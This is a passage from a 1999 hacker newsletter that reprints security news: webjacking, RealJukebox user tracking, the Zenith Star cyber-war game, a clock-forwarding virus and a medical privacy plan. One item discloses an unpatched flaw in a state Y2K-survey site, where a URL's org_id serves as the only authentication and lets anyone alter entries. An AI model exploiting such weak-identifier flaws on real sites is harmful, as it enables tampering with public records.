06.0 Trust Site Solution Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
As the Federal Trade Commission continues with its
efforts to decrease webjacking, Inspective Systems is
set to come out with Trust Site Solution, which is being
claimed as the first content-certification program. The
software aims to protect the users and consumers
against people who use simple HTML tricks to redirect
traffic from legitimate web sites to fake ones. This can
lead unsuspecting consumers into giving up their credit
card numbers and other personal information.
InfoWorld
http://www.infoworld.com/cgi-bin/displayStory.pl?991029.hnwebjack.htm
IT gets tools to thwart Webjackers
By Ed Scannell
InfoWorld Electric
Posted at 4:43 PM PT, Oct 29, 1999
As millions of IT organizations hurry to get their businesses on-line
to cash in on the electronic-commerce gold rush, it is getting more
complicated to build trust among users by guaranteeing that Web site
information is accurate and securely protected.
The latest challenge to that guarantee is "Webjacking," the nasty business
of hackers hijacking legitimate Web pages and redirecting users to
anywhere from pornography sites to sites set up for fraudulent business
schemes.
Some industry observers believe that, if the practice continues to
escalate unchecked, it could eventually erode users' buying confidence and
negatively affect corporations' e-commerce revenues.
But while the bad guys appear to have a technical head start, good guys
responsible for coming up with preventative security cures are starting to
appear. Inspective Systems, formerly known as Factpoint, a small software
company in Burlington, Mass., will release by the end of the year
its Trustsite Solution, which officials claim is the first
content-certification program for Web sites.
The solution basically sets up a separate certification server for each
Web site and creates a digital fingerprint for each certified page and
each piece of content. Another component of the package sets up a
validation server that constantly monitors a site's certified
content as each page is loaded.
Some observers believe that Inspective's product could play a significant
role in softening the anxieties of both corporate users and consumers.
"What is interesting about what Factpoint [does, is that it provides] a
way to ensure authentication. You can install software on your machine
that verifies that what you have is what you think you have,'' said Carol
Baroudi, senior strategist for electronic business at the Hurwitz
Group, in Framingham, Mass.
"Many people using the Web have no understanding that just because you see
it, doesn't mean it is true. [Webjacking] is becoming more and more
pervasive as people begin to understand how to manipulate the Web. These
incidences will rise considerably on both corporate and consumer
levels," Baroudi said.
Still, the practice has become enough of a threat that Federal Trade
Commission officials late last month announced that the commission would
crack down on Webjackers, saying that it is now looking into its one
hundredth related Internet case.
Although most analysts believe that tens of millions of dollars have
already been hijacked from legitimate sites, none of them are willing to
offer estimated figures on the losses. The problem is that few companies
are willing to admit they have been victimized in a fraudulent
scheme, either out of embarrassment or in fear of drawing the attention of
more hackers.
"There is no way you announce to the world that someone has hacked your
site. It's like sending out an invitation to 'Hacker Central' to take
another whack at you," said one IT executive at a large East Coast
publisher.
Unfortunately, redirecting traffic from a legitimate Web site is easy to
do. In many cases, it involves copying a Web site's opening page. Then,
with just a few lines of code, hackers can get all of a site's HTML links
to point to an illegitimate site. In other cases, it is a matter of
adding just a few meta tags to a popular search engine used to find Web
sites.
"Essentially, [hackers] are inserting themselves in the middle. They will
gladly pose as legitimate. Eventually, they are hoping you will add things
to their site's shopping cart," commented Charles Palmer, manager of
network security and cryptography at IBM's T.J. Watson Research
Center, in Yorktown Heights, N.Y.
One result of this could be that hackers can steal credit card numbers
from unsuspecting consumers and corporations' buying agents.
An even simpler approach for perpetrators is that for less than $100, they
can register the name of popular domains. By just changing an "o'' in a
Web site name to a zero, they can set up a fraudulent site. Earlier this
year, a would-be hacker registered the domain "Micr0soft,'' but it
was discovered before any damage was done.
However, there have been a handful of highly publicized cases. Earlier
this year, hackers posted a false financial news story about PairGain, a
California-based communications company, making it look as if the story
appeared on the Bloomberg financial news service Web site.
The bogus story, which said that PairGain was being bought by a well-known
telecommunications company, sent PairGain's stock rocketing and then
free-falling.
Ed Scannell is an InfoWorld editor at large.
@HWA
07.0 Hacker or Cracker or Neither. Which Word to Use?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Ex Machina
The Providence Journal takes a stab at trying to define
the difference between the words 'hacker' and 'cracker'.
Unfortunately they fail miserably. At this point people
should just give up and use other words all together.
There are enough other words available that can be
used instead of confusing people with words which
mean different things to different people.
The Providence Journal
http://www.projo.com/report/pjb/stories/02732702.htm
10.31.99 00:04:53
BOB KERR
What used to be a bad thing is now a good
thing
Just because someone is a hacker doesn't mean he, or she, is a bad
person.
In fact, some people wear the term with pride. They put it on their
business cards.
But a cracker is something else entirely. A cracker is a hacker gone bad.
A hacker is a computer ace who uses the computer to make the world a
better place. A cracker is a computer ace who uses the computer for
evil.
(And just to make this perfectly clear, when speaking of a ``cracker'' we
are not referring to a man of the South with a Jesse Helms bumper
sticker on his pickup and a slow, easy way of making a point.)
There was a time, maybe a couple of months ago, when ``hacker'' was
clearly a bad thing to call somebody. A hacker was cheap, devious,
mediocre.
But, by some proclamation within the Computer Nation, the hacker is
now good, not bad.
It's in all the fan magazines, the ones that have things on their covers like
the ``all-new iMac with speeds of up to 400MHz.''
The conversion of the hacker is reminiscent of that undergone by Randy
``Macho Man'' Savage, a villain who became a hero in the World
Wrestling Federation. That was in all the fan magazines, too.
Put another way, a hacker is a guy who gets to a firewall and stops. A
cracker is a guy who gets to a firewall and figures out a way to go
through it.
A firewall? You thought it was something to keep a fire from spreading
through a building? Not anymore. It's something to keep a cracker from
spreading through a Web site.
What brought all these tortuous twists in terminology to light is a recent
case in East Greenwich in which the police reported that they had
tracked down a 15-year-old high-school student suspected of using a
home computer to go on the Internet and portray a local teacher as a
molester of children and animals.
The student allegedly entered an open, unsecured Web site that teachers
use to post homework assignments and class notes and refer students to
other helpful Web sites. And, in a technological way, the student painted
the teacher ugly.
The police found the young techno-trespasser easily. They traced him
through an America Online account right to his front door.
And that means this kid has zero status among hackers, and probably
crackers, as well. He just didn't have to do enough to get where he
wanted to go. And the police didn't have to do enough to catch him.
In the mad, twitchy passions that fuel Internet addictions, there are clearly
some showboats. They can go places others can't. And, as surely as
soaring kings of playground basketball, they need to make it clear that
there is a big difference between their moves and those of a plodding,
earthbound kid.
Those who have put in hundreds of long, lonely hours with a computer
mouse and a bug-eyed lock on the computer screen might end up a little
pale and prone to a nervous blink. But they still want to strut their stuff.
As soon as the story of the East Greenwich Internet abuser became
public, hackers responded. They didn't want anyone confusing a four- or
five-click after-school romp on the Internet with the simply amazing
things they can do with a computer. They clearly resented any implication
that the kid was even playing the same game.
``A simple prank which required very little sophistication to carry out'' is
what one proud hacker disdainfully called the East Greenwich caper.
The same hacker also provided the information that anyone with a
butt-kicking hard drive probably already knew: the hacker is good; the
cracker is bad.
It's so difficult to keep pace. You grow up remembering the nasty little
brute from down the block who beat your arms black and blue during
pickup basketball games. And you thought of him as one thing, and one
thing only: a hacker.
Now, who's to know? The Internet has changed everything. The hacker
is different from what he used to be. Maybe the hack is, too.
Bob Kerr can be reached by E-mail at bkerr@projo.com.
@HWA
08.0 New Virus Discovered in London
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by nvirB
The London Sunday Times is reporting that a new virus
is spreading throughout London firms and beyond that
advances a system clock several months. This causes
time sensitive passwords to expire forcing users to
reenter them. Somehow the origin of the virus has been
traced to Bulgaria, Romania and Scandinavia. While this
is a long article there really isn't much technical
information supplied the Times seems to just be
spreading Fear and not valuable information. (If anyone
has more accurate and verifiable information on this we
would like to hear it.)
The London Sunday Times
http://www.sunday-times.co.uk/news/pages/sti/99/10/31/stinwenws01032.html?999
October 31 1999 BRITAIN
E-virus turns clocks to 2000
Mark Macaskill
BRITISH companies are being attacked by mystery hackers
with a virus that dupes computers into thinking that the
millennium has already arrived.
The bug, which forwards internal computer clocks to
January 1, 2000, is capable of crippling systems for up to
three days, during which time valuable data can be stolen or
wiped out.
Security software experts have been called in to combat the
threat posed by the virus. They believe it is capable of
overpowering almost all computers, including Y2K-
compliant systems which have been deemed ready for the
rollover to the new millennium.
D K Matai, managing director of mi2g, a security software
company which advises many of London's financial
institutions, said: "Hackers are causing chaos with this code
because it can immediately shut down computer systems.
There are not just financial risks to be considered; serious
safety issues are also involved."
The virus, known as a clock-forwarding code, has been
unleashed on companies in America and Europe. Experts
have traced its origin to Bulgaria, Romania and Scandinavia
but have been unable to identify the hackers.
The virus is typically disguised as an e-mail or file and can lie
undetected in computer systems indefinitely, enabling an
individual hacker to attack hundreds of companies
simultaneously, a practice known as "flooding".
On activation, internal clocks can be forwarded months,
fooling computers into thinking that software programmes
and passwords, which in reality are valid, have expired.
Last month it was detected in Britain for the first time after a
company reported that it was unable to access 40% of its
system. It took three hours to resume operations, by which
time thousands of pounds' worth of damage had been
caused.
During a recent conference on electronic security held by
mi2g, it was revealed that Y2K-compliant systems were also
under threat. Tests carried out earlier this year on an oil rig
and car plant, both classified as millennium-compliant, in
which clocks were forwarded to the millennium date, caused
up to 40% of computers to fail.
Small to medium-sized companies, which do not have
security software to protect their central clocks, are thought
to be particularly vulnerable.
@HWA
09.0 Krystalia, In Memorium
~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Netmask
A well know hacker, Krystalia, passed away Friday from
Cancer. She was a good friend to many people. You
may have met her at one of the Defcon Conventions, or
just talked to her online. She was a very intelligent and
loving girl. She will never be forgotten, and will be
missed by many. A tribute site has been set up and
they are asking for contributions of kind words, pictures,
or writings.
http://www.krystalia.org/
@HWA
10.0 RealNetworks Changes Privacy Policy Amid Controversy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by AlienPlague, Atropsy, and Hamartia
It has been learned that RealNetworks' RealJukebox
software monitors users and sends the data it collects
back to the company. The data collected includes user
listener habits, what file types the user plays, and a
globally unique identifier (GUID), among other things.
RealNetworks never informed anybody of these facts,
but claims that this is not an invasion of privacy.
(Ummm, yeah.)
C|Net
http://news.cnet.com/news/0-1005-200-1425866.html?tag=st.ne.1002.thed.1005-200-1425866
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2385034,00.html?chkpt=zdhpnews01
Late Sunday evening, after the above story broke,
RealNetworks changed its privacy policy to reflect the
new data being collected. The voluntary privacy
watchdog group Truste has been called on to
investigate the matter. Privacy advocates will closely
watch Truste's actions since they question if the
industry can adequately police itself.
(RealJukebox may be free software but we question
what you are really paying for it.)
C|Net
http://home.cnet.com/category/0-1005-200-1426044.html
Is RealNetworks software keeping tabs on user habits?
By Reuters
Special to CNET News.com
November 1, 1999, 3:55 a.m. PT
NEW YORK--RealNetworks' RealJukebox software monitors users' listening
habits and some other activities and reports the information and the
user's identity to the company, according to reports.
A security expert intercepted and examined information generated from
the program, and company executives acknowledged that RealJukebox
gathers information on what users are playing and recording, the New
York Times said.
RealJukebox is used to play compact discs on computers and can copy
music to a user's hard drive and download music from the Internet.
Dave Richards, RealNetworks' vice president for consumer products,
told the Times the company gathered the information to customize
service for individual users.
He and other company executives said the practice did not violate
consumer privacy because the data was not stored by the company or
released to other companies, the Times said.
But privacy advocates and security experts agreed that it was a
violation of the privacy of the 13.5 million registered users of
RealJukebox, the Times said, particularly because RealNetworks has
not informed consumers they are being identified and monitored.
Richard Smith, a Brookline, Massachusetts-based independent security
consultant, said the numbers of songs stored on a user's hard drive,
the kind of file formats in which the songs are stored, the
user's preferred genre of music, and the type of portable music player,
if any, the user has connected to the computer are sent to the company,
the Times said. In addition, a personal serial number known as a
globally unique identifier, or GUID, is also sent to RealNetworks,
the paper said.
The fact that RealNetworks gathers the information is not mentioned
in the privacy policy posted on its Web site, the Times said, or in
the licensing agreement users must approve when installing RealJukebox.
-=-
ZDNet;
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
RealNetworks is watching you
By Reuters
November 1, 1999 4:51 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2385034,00.html?chkpt=zdnntop
NEW YORK -- RealNetworks Inc.'s RealJukebox software monitors user
listening habits and other activities and reports the information and the
user identity to the company, the New York Times said.
A security expert intercepted and examined information generated from the
program, and company officials acknowledged that RealJukebox gathers
information on what users are playing and recording, the Times said.
RealJukebox is used to play compact disks on computers and can copy music
to a user's hard drive and download music from the Internet.
Violation of privacy? Dave Richards, RealNetworks' (Nasdaq:RNWK)
vice president for consumer products, told the Times that the company
gathered the information to customize service for individual users.
Richards and other company officials said the practice did not violate
consumer privacy because the data was not stored by the company or
released to other companies, the Times said.
But privacy advocates and security experts agreed that it was a violation
of the privacy of the 13.5 million registered users of RealJukebox,
the Times said, particularly because RealNetworks has not informed
consumers they are being identified and monitored.
Richard Smith, a Brookline, Mass.-based independent security consultant,
said the numbers of songs stored on a user's hard drive, the kind of
file formats in which the songs are stored, the user's preferred genre of
music, and the type of portable music player, if any, the user has
connected to the computer are sent to the company, the Times said.
In addition, a personal serial number known as a globally unique
identifier, or GUID, is also sent to RealNetworks, the paper said.
The fact that RealNetworks gathers the information is not mentioned in the
privacy policy posted on its Web site, the Times said, or the
licensing agreement users must approve when installing
RealJukebox.
CNet;
RealNetworks changes privacy policy under scrutiny
By Courtney Macavinta
Staff Writer, CNET News.com
November 1, 1999, 10:40 a.m. PT
update RealNetworks quietly changed its privacy policy this weekend
to disclose a controversial practice of tracking Net music listeners
through unique identification numbers assigned to its software.
The practice was reportedly discovered by Richard Smith, a
Massachusetts-based independent security consultant, who had examined
information generated from RealNetworks' RealJukebox software. The story
was first reported in this morning's editions of the New York Times.
The company confirmed today that an identifier existed that could be used
to keep tabs on what users are playing and recording. Although many Web
sites track users' habits, RealNetworks had not previously disclosed its
practices in its privacy policy, which is certified by the Web privacy
seal program Truste.
Without explanation this weekend, RealNetworks added a section to its
privacy policy stating that users are assigned a "Globally Unique
Identifier" (GUID) when they download its RealJukebox software to copy or
play digital music via their computers.
RealNetworks confirmed that the policy was changed and that it would
release details about it later today.
"I don't know when that change took place, but we'll get a response out
by noon," RealNetworks chief operating officer Thomas Frank said today.
"Any of the information we've been collecting has been designed to make
the best experience for the user."
While writing a letter to Truste calling for an investigation of
RealNetworks' privacy practices, Jason Catlett, founder of Junkbusters,
a clearinghouse for privacy-protection measures, discovered that
the policy had been changed.
"When I was writing that letter on Sunday night, I found that suddenly
the GUID was described in their policy, and that wasn't there on Friday,
because I have a copy of the policy that was there on Friday," Catlett
said in an interview.
The revised privacy policy makes clear how the GUID is used. "We may
use GUIDs to understand the interests and needs of our users so that we
can offer valuable personalized services such as customized RealPlayer
channels," the new policy states. "GUIDs also allow us to monitor the
growth of the number of users of our products and to predict and plan
for future capacity needs for customer support, update servers, and
other important customer services."
Privacy advocates warn that user IDs can be used to build profiles on Net
users, combining surfing habits with personal information such as the home
addresses and credit card numbers gathered by RealNetworks in its
licensing agreement with RealJukebox users.
The profiles could be used for marketing, but if they are stored by a
company they also could be subpoenaed by law enforcement officials during
an investigation.
Although the policy discloses the practice, Catlett says that the practice
is still invasive and that Truste should reprimand the company. "It's
shameful and unacceptable that they are tracking people like packages
without telling them," he said. "I have asked Truste to determine
whether this is a breach."
Truste, which licenses out its privacy seals and monitors whether
companies are in compliance with their data-collection policies, said
today that it will investigate RealNetworks' practices.
"Anytime the privacy statement changes, it's of critical concern for us
because we certify that the practices are in line with the policy," said
Dave Steer, Truste's communications manager.
"We will look at whether they knew what they were doing, why they were
doing it, and [whether] they intentionally left it out of their statement
until there was public outcry," he added. "We are really concerned about
what is going on, and we're going to look at whether RealNetworks is
breaching its contract with Truste."
Another test for self-regulation How Truste handles the RealNetworks
complaint will be closely watched by privacy advocates, who have long
contended that industry guidelines are no substitute for stricter
consumer-protection laws.
Voluntary programs such as Truste have been lauded by the White House and
the Net industry as a key solution for protecting consumers' online
privacy, but consumer groups argue that they lack enforcement. If a site
fails to comply with its Truste-certified privacy policy, it could
have its privacy seal revoked, or in the worst case a complaint could be
filed with the Federal Trade Commission.
But as the RealNetworks privacy policy switch also shows, sometimes the
policies themselves are not true reflections of a company's online
data-collection practices, or they may not be detailed enough. This is not
uncommon, according to a study released in May by Mary Culnan of
Georgetown University's McDonough School of Business.
Culnan's Georgetown Internet Privacy Policy Survey examined 364 ".com"
sites that were randomly selected from the 7,500 most-visited Web sites.
Although 65.7 percent of the sites have privacy policies or give notice
that personal information has been securely transmitted, only 9.5
percent of the sites had an "adequate" privacy policy, the study found.
@HWA
11.0 JTF-CND Runs CyberWar Simulation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Punkis
Joint Task Force-Computer Network Defense (JTF-CND)
conducted a cyber-war game in early October of this
year. The effort was named Zenith Star and was the
first such simulation since Eligible Receiver in 1997.
Participants in the exercise included representatives
from NSA, CIA, FBI, Defense Department and other
agencies. The war game included powergrid blackouts,
911 emergency system outages, disrupting crucial
Pentagon computer networks and other situations.
(This article also regurgitates the story about the
SPAWAR printer whose print jobs where redirected to
Russia. We would love to have more information on that
security hole if anyone has it.)
LA Times
http://www.latimes.com/news/asection/19991031/t000098778.html
U.S. Scurries to Erect Cyber-Defenses
Security: As threat rises, government task force prepares for Internet combat.
By BOB DROGIN, Times Staff Writer
FT. MEADE, Md.--Distant forests dominate the view from the
eighth-floor director's suite at the National Security Agency,
America's largest intelligence gathering operation. But the talk
inside is of a more troubling horizon: cyberspace. "Think of it as a
physical domain, like land, sea and air," said Air Force Lt. Gen.
Michael V. Hayden in his first interview since taking the NSA's helm
in May. "Now think of America conducting operations in that new
domain." These days, many in the U.S. intelligence, law enforcement
and national security community are thinking of little else. The
Pentagon has stepped up cyber-defense and is planning cyber-combat.
The FBI is still struggling to unravel Moonlight Maze, a massive
assault on U.S. government computers that has been traced to Russia.
Prodded by the White House, other agencies are also scrambling to
protect America's electronic infrastructure from a daily digital
barrage from around the world. The stakes could not be higher. Put
simply, how can an increasingly wired America best defend itself from
hostile nations, foreign spies, terrorists or anyone else armed with
a computer, an e-mail virus and the Internet? And how can America
fight back in the strange new world of warp-speed warfare? The
answers so far are not encouraging. "The pace of technological change
is rapidly outstripping our existing technical edge in intelligence
that has long been one of the pillars of our national security," said
CIA Director George J. Tenet. The United States faces "a growing
cyber-threat" from "weapons of mass disruption," Tenet said.
"Potential targets are not only government computers but the
lifelines that we all take for granted: our power grids and our water
and transportation systems." That threat is why 50 experts from the
NSA, CIA, FBI, Defense Department and other agencies gathered in
early October in a drab office building in Falls Church, Va., for a
classified war game that was code named Zenith Star. For two days,
they huddled behind closed doors to test America's response to a
simulated surprise attack by electronic evildoers--the first such
effort since a 1997 exercise found the U.S. government almost
defenseless in cyber-war. This time, enemy hackers supposedly had
triggered blackouts around major military facilities near Chicago,
Honolulu and Tampa, Fla. They paralyzed 911 emergency response
systems with a flood of computer-generated calls. Then they started
disrupting crucial Pentagon
computer networks. The mock scenario was
"based on actual vulnerabilities," explained Air Force Maj. Gen. John
H. Campbell, who ran Zenith Star as head of the Pentagon's new Joint
Task Force-Computer Network Defense in Arlington, Va. Although
results are not in, Campbell said, he believes coordination and
cooperation have improved since Eligible Receiver, the classified
1997 war game that found America unprepared for cyber-attack. In that
exercise, a team of NSA hackers proved that they could easily disable
power, telephones and oil pipelines across the country, as well as
Pentagon war-fighting capabilities. The joint task force was one
result. Operational since June, it aims to organize defense of the
Pentagon's 2.1 million computers, 10,000 local networks and more than
100 long-distance networks. The unit formally became part of the
Pentagon's combat mission on Oct. 1, when it was attached to U.S.
Space Command, based in Colorado Springs, Colo. A separate task force
will be established next October to safeguard against computer
network attack, Campbell said. Now the computer defense force runs a
24-hour operations room that looks like the set of a Hollywood
thriller. Inside the Secure Compartmented Information Facility, a
dozen experts tend banks of classified and unclassified computers.
Red digital clocks on the ceiling show time zones around the world.
Three huge screens on one wall monitor major military computer nodes
in the United States, Europe and the Pacific. Three other large
screens are tuned to TV networks. Campbell, a veteran fighter pilot,
sees cyberspace as the wild new yonder. Donning his worn leather
flight jacket for an interview in a drafty task force office, he
warned that terrorists rely increasingly on computers for planning
and communication. "We see more and more terrorist organizations . .
. are recruiting computer-smart people and even providing the
training for them," Campbell said. Most attacks on U.S. government
computers have involved politically motivated vandalism, not
terrorism. During the Kosovo conflict last spring, for example, the
White House and numerous other government departments and agencies
were forced to take down Web sites after hackers defaced them with
electronic graffiti. But the hackers are more malicious and more
powerful than ever. Despite the increased protection, two unknown
groups used multiple simultaneous attacks last week to penetrate and
deface 13 government and military sites, including the U.S. Army
Reserve Command, the White Sands Missile Range, the National
Aeronautics and Space Administration's Jet Propulsion Laboratory, the
National Defense University and the Naval Coastal Systems Center. To
be sure, U.S. officials insisted that no one has stolen military or
other national security secrets by penetrating a classified computer
system from outside. But it clearly is not for want of trying.
Consider the Navy's Space and Naval Warfare Systems Command Center in
San Diego, which helps safeguard naval intelligence codes. Its
unclassified computer systems, a senior official said, are "under
constant attack, more than one a day from outside the country."
Spawar, as it is commonly called, has traced hackers this year alone
to Argentina, Australia, Brazil, Britain, China, France, Italy,
Israel, Japan and Russia. Most use programs to electronically "sweep"
the Spawar systems, looking for unguarded access points. "For every
protection we put up, they find a way around it," he said. "Many get
in, rummage around, package files and send them off. A few gain root
access," or complete access to the compromised system. "It's steadily
increasing, steadily getting worse." In February, someone even used
the Internet to secretly program a new password for a Hewlett-Packard
printer at Spawar so that copies would print out in Russia. The
intrusion was detected before sensitive files were lost, the official
said. In that case, as in most, officials never determined whether a
curious teenager, a foreign intelligence agency or someone else was
responsible for the intrusion. "Often you don't know what you're
dealing with until you're pretty far along in an investigation," said
Michael A. Vatis, America's top cyber-cop. "You don't know if you
have a single intrusion or a concerted attack." Vatis heads the FBI's
National Infrastructure Protection Center, the focal point of the
federal government's effort to prevent, detect and prosecute
cyber-crimes. The center has 800 pending hacker, virus and intrusion
cases, up from 200 two years ago. Most involve disgruntled employees
who sabotage computer systems for revenge or crooks who use the
Internet for scams and fraud. But Vatis said that he worries most
about what he calls "America's Achilles' heel," the growing reliance
on computer-controlled systems built for efficiency, not security.
"We know other countries are building information warfare
technology," he said at the headquarters of the infrastructure
protection center, a warren of computer cubicles on the 11th floor of
the FBI building in Washington. "We know countries are engaged in
espionage and economic espionage." The FBI, for example, has tried to
determine if cyber-spies at Moscow's prestigious Russian Academy of
Sciences are responsible for Moonlight Maze, the most pervasive
assault yet on sensitive U.S. Defense Department and other computer
networks. The first Moonlight Maze attack was detected in March 1998.
Three months later, U.S. security sleuths were able to monitor a
series of intrusions as they occurred and traced them back to seven
dial-up Internet connections near Moscow. But the intense attacks
continued until at least last May, and the FBI investigation remains
open. One reason: U.S. officials are unable to determine if the trail
really stops in Moscow or simply appears to. Either way, the
Moonlight Maze attack was enormous. U.S. officials said that the
intruders systematically ransacked hundreds of essential but
unclassified computer networks used by the Pentagon, the Energy
Department, NASA, defense contractors and several universities. Vast
amounts of technical defense research were illegally downloaded and
transferred to Russia. Investigators found that the hackers used
workstations running Sun operating systems and routed high-speed
calls through U.S. university network servers to hide their tracks.
They usually logged into government computer systems with stolen
passwords. Attacking from within, they gained root access to numerous
systems. The intruders also sometimes created illegal "back doors" to
secretly reenter the compromised systems, the evidence showed. They
also installed "sniffers," which let them monitor sensitive
communication along U.S. government networks, thus sending Russia
e-mail as well as other sensitive information stored in compressed
data files. One private-sector target was Meganet Corp., which is
based in Tarzana and sells 21 versions of commercial encryption
software that it bills as "unbreakable." U.S. export controls
prohibit sale of the software overseas, the company says. In two
overnight attacks in July 1998, Meganet's Web servers were swamped
with "tens of thousands" of hits from "Lab 1313," an unknown group
that used an Internet connection from the Russian Academy of
Sciences, according to Michael Vaknin, the company's general manager.
He said that the attackers sought source code for the encryption
software but failed because it is kept on a separate system. Not long
ago, few Americans outside the secretive National Security Agency
were concerned with the esoteric field of encryption or the theft of
digital data. The high-tech NSA, which does the government's code
making and code breaking, is responsible for the covert collection of
signals intelligence, or "Sigint," from around the world. The
explosion of new computer and communications technology has given the
intelligence agency powerful new tools--but it has also made the
agency's job much more difficult. Hayden, the NSA director, conceded,
"It was easier to be top dog before."
@HWA
12.0 State Y2K Data Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by CyberDiva
Currently, a state government web site is providing
information on that states computer system
preparedness levels. This information is made freely
available to the general public. You, as a web surfer,
may go and review this information. You can view the
status of Public Utilities (gas, water, power), Health
Care Providers, the 911 system, Telecommunications,
etc. Then because the site is configured incorrectly you
can change the information to read whatever you like.
(Talk about Y2K panic.)
NewsTrolls
http://newstrolls.com/news/dev/guest/110199.htm
UPDATE 12:45PM EST Tuesday,Nov. 2: It appears someone has changed the Y2K
survey URLs so they no longer include the org_id; however, the old URLs
which include the org_id are still functional and entering the org_id numbers
into the Y2K Survey update box will still enable anyone with an id to alter a
company's Y2K Survey Data. Unless companies are given new org_ids for their
Y2K Surveys and old URLs containing the org_id are rendered inoperable, the
security hole is still intact...
diva Note: As of 9AM EST Monday, neither NewsTrolls nor NetworkCommand has
heard back from anyone related to the site. We have been trying to contact
them since last Friday. For security reasons we are not publishing which US
state has the following security hole so that Y2K surveys already entered
will not be compromised. Unfortunately, the ability to exploit the hole
still exists.
Y2K State Surveys Security Hole
By Mike of NetworkCommand
Overview:
=========
Y2K information subject to exaggeration or gross understatement.
Issue:
======
Because no one is really sure what to expect, be sure to expect the unexpected.
Platform Effected:
==================
Earth.
Summary:
========
Currently, a State Government web site is providing Y2K Preparedness
information to the general public. You, as a citizen, may go and review
this information. You can view the status of Public Utilities (gas, water,
power), Health Care Providers, the 911 system, Telecommunications, etc. You
can read what you might expect:
-We're almost done.
-We do not impact essential functions.
You can read what you might not expect:
2) Do you have, manufacture, or distribute any equipment controlled by
computers? NO
3) If you answered "yes" to the above question, can failure of computer
controlled equipment cause untreated sewage to be released to the
environment or an interruption of service? YES
So, does this company have any computers? Or, could the failure of those
computers they don't have cause the the untreated sewage to be released?
Even more, this one from a Natural Gas Company:
3) What is the date that the Y2K project started? (mm/dd/yyyy) 11/1998
Contingency Plan Development Start Date (mm/dd/yyyy) 12/1997
Aren't those backwards? Don't you have to start the project before you
make a Contingency Plan? Are you guessing?
Anyway, as you can see I'm not sure these people can be trusted with
paperwork.
Now here's the kicker.
These Preparedness statements are available online. If you're a company,
you can fill one out. If you're a citizen, you can review them.
However, due to an error in the web sites code, if you can find an org_id,
you can submit a Preparedness statement. An org_id looks like this:
view.cgi?org_id=14633927754506433&round=2 And guess what they are using
for authenication? You got it, the org_id. Someone who wanted to modify
these statements could get the org_id and click the button called "Submit
Preparedness Statement." They could then change an existing statement or
send in a new one.
Please bear in mind, this is all in accordance with a state law.
At this time multiple attempts have been made to contact the administrators
of this web site and inform them of the problem.
Hopefully no one will modify these documents in the meantime. I doubt
they have any tape backups.
The moral of this story?
If I have to spell it out, it wouldn't make sense to you anyway...
Mike
NetworkCommand.com
(when you can't just pull the plug)
@HWA
13.0 Clinton Privacy Plan: Is it Enough?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Maggie
President Clinton has unveiled a privacy plan aimed at
protecting the privacy of individually identifiable health
information. The plan would require health plans to get
consent before releasing electronic medical records,
requires patient notification of use of records, and it
would let patients view and correct their records. The
rules are slated to go into effect on Feb. 21, 2000, after
public comment on the issue. (This is at least a first
step. There is so much further to go.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2384723,00.html?chkpt=zdnntop
Department of Health and Human Services - Contains Full Text and Summary of the Proposal
http://aspe.hhs.gov/admnsimp/
ZDNet;
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Clinton privacy plan: only a first step
By Lisa M. Bowman, ZDNN
October 29, 1999 4:18 PM PT
URL:
In an attempt to prevent strangers from snooping at your online medical records, President Clinton
Friday unveiled a plan that would place restrictions on how electronic medical information is used.
The plan would require health plans to get consent before releasing electronic medical records in
most cases, and requires them to notify patients about how their records are used. It also would
let patients view and correct their records. The rules are slated to go into effect on Feb. 21, 2000,
after public comment on the issue.
During his speech introducing the plan, Clinton acknowledged that electronic medical records can
help save lives and lower costs. But he said that shouldn't be at the expense of privacy.
Horror stories
"Every American has a right to know that his or her medical records are protected at all times
from falling into the wrong hands," Clinton said in a prepared statement from the Oval Office. "As
they have been stored electronically, the threats to our privacy have substantially increased."
As more and more records have been transferred into electronic form, horror stories about the
release of medical records have alarmed consumers and privacy advocates. During his speech,
Clinton cited a survey showing that one-third of all Fortune 500 companies check medical records
before they hire or promote people.
"This is wrong," he said. "Americans should never have to worry that their employers are looking
at the medications they take or the ailments they've had."
Hacker attack
In September, hackers circulated a phone number that allowed anyone to access a database of
private medical records stored at St. Joseph Mercy Hospital in Pontiac, Michigan. The hospital
had been using a digital system that let doctors dictate medical records.
Congress does not need to pass the Clinton plan because it missed a self-imposed August
deadline requiring it to address online privacy or cede decisions on the issue to the secretary of
health and human services.
Praise from privacy advocates
Privacy advocates and medical community members lauded the proposed rules as a first step
toward ensuring that online medical records won't fall into the hands of marketers, corporate Big
Brother types or the merely nosy. But they said the rules are only the first in a series of measures
needed to truly protect the records.
"This is a wonderful start," said Dr. Michael Rozen, Director of Health Record Security for
WellMed Inc. "With all of its limitations -- it only covers electronic records, it doesn't really
protect consumers surfing sites -- the bottom line is this is more protection than we've ever seen,"
he said. Rosen said his company, which makes software that lets people access health information,
already is more strict with medical data than would be required under the Clinton plan.
While the Clinton rules outline how health care sites and the medical community must deal with
electronic records, they don't address scenarios when law enforcement is seeking access to them.
They only apply to electronic, not paper, records. And they also don't restrict general health sites
from sharing information about their visitors. For example, a health site containing information
about AIDS or drug addiction can still freely release information about people who visit those
sections.
Nevertheless, Rozen said the Clinton plan should boost consumer confidence in medical sites
because people can rest assured their medical records are safe. "It will do a great deal to provide
consumers some protections for their medical records in electronic form," Rozen said.
The new rules come as major players in the tech industry are jumping into the medical market.
Two weeks ago Intel Corp. joined American Medical Association on a project that will let
doctors and consumers exchange online medical records. That plan includes digital credentials for
